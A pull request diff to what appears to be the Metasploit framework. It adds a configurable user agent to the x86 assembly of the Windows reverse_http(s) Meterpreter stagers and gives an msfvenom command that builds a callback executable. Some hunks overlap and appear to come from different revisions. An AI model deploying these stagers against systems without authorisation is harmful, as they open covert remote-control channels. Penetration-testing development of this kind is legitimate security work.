### PR TITLE
set user agent in Windows reverse_http(s) stagers

### DIFF
--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -275,7 +275,7 @@ module Payload::Windows::ReverseHttp
         push ebx               ; DWORD dwAccessType (PRECONFIG = 0)
       ^
     end
-    if opts[:ua].to_s.empty?
+    if opts[:ua].nil?
       asm << %Q^
         push ebx               ; LPCTSTR lpszAgent (NULL)
       ^

--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -255,38 +255,43 @@ module Payload::Windows::ReverseHttp
         xor ebx, ebx           ; Set ebx to NULL to use in future arguments
     ^
 
+    asm << %Q^
+    internetopen:
+      push ebx               ; DWORD dwFlags
+    ^
     if proxy_enabled
       asm << %Q^
-      internetopen:
-        push ebx               ; DWORD dwFlags
         push esp               ; LPCTSTR lpszProxyBypass ("" = empty string)
       call get_proxy_server
         db "#{proxy_info}", 0x00
       get_proxy_server:
                                ; LPCTSTR lpszProxyName (via call)
         push 3                 ; DWORD dwAccessType (INTERNET_OPEN_TYPE_PROXY = 3)
-      call get_useragent
-        db "#{opts[:ua]}", 0x00
-                               ; LPCTSTR lpszAgent (via call)
-      get_useragent:
-        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
-        call ebp
       ^
     else
       asm << %Q^
-      internetopen:
-        push ebx               ; DWORD dwFlags
         push ebx               ; LPCTSTR lpszProxyBypass (NULL)
         push ebx               ; LPCTSTR lpszProxyName (NULL)
         push ebx               ; DWORD dwAccessType (PRECONFIG = 0)
+      ^
+    end
+    if opts[:ua].to_s.empty?
+      asm << %Q^
+        push ebx               ; LPCTSTR lpszAgent (NULL)
+      ^
+    else
+      asm << %Q^
+        push ebx               ; LPCTSTR lpszProxyBypass (NULL)
       call get_useragent
         db "#{opts[:ua]}", 0x00
                                ; LPCTSTR lpszAgent (via call)
       get_useragent:
-        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
-        call ebp
       ^
     end
+    asm << %Q^
+      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
+      call ebp
+    ^
 
     asm << %Q^
       internetconnect:

--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -265,7 +265,10 @@ module Payload::Windows::ReverseHttp
       get_proxy_server:
                                ; LPCTSTR lpszProxyName (via call)
         push 3                 ; DWORD dwAccessType (INTERNET_OPEN_TYPE_PROXY = 3)
-        push ebx               ; LPCTSTR lpszAgent (NULL)
+      call get_useragent
+        db "#{opts[:ua]}", 0x00
+                               ; LPCTSTR lpszAgent (via call)
+      get_useragent:
         push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
         call ebp
       ^
@@ -276,7 +279,10 @@ module Payload::Windows::ReverseHttp
         push ebx               ; LPCTSTR lpszProxyBypass (NULL)
         push ebx               ; LPCTSTR lpszProxyName (NULL)
         push ebx               ; DWORD dwAccessType (PRECONFIG = 0)
-        push ebx               ; LPCTSTR lpszAgent (NULL)
+      call get_useragent
+        db "#{opts[:ua]}", 0x00
+                               ; LPCTSTR lpszAgent (via call)
+      get_useragent:
         push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
         call ebp
       ^

--- a/modules/payloads/stagers/windows/reverse_http.rb
+++ b/modules/payloads/stagers/windows/reverse_http.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_http'
 
 module MetasploitModule
 
-  CachedSize = 347
+  CachedSize = 414
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows

--- a/modules/payloads/stagers/windows/reverse_https.rb
+++ b/modules/payloads/stagers/windows/reverse_https.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_https'
 
 module MetasploitModule
 
-  CachedSize = 367
+  CachedSize = 434
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows


### PR DESCRIPTION
Fix #11075 set the user agent in Windows reverse_http(s) payloads.

## Verification

- [x] Generate a payload like `./msfvenom -p windows/meterpreter/reverse_http HttpUserAgent=Monkeycom  lhost=192.168.56.1 -f exe -o test.exe`
- [x] Start a listener and verify that the HTTP GET header initially contains the correct user agent.
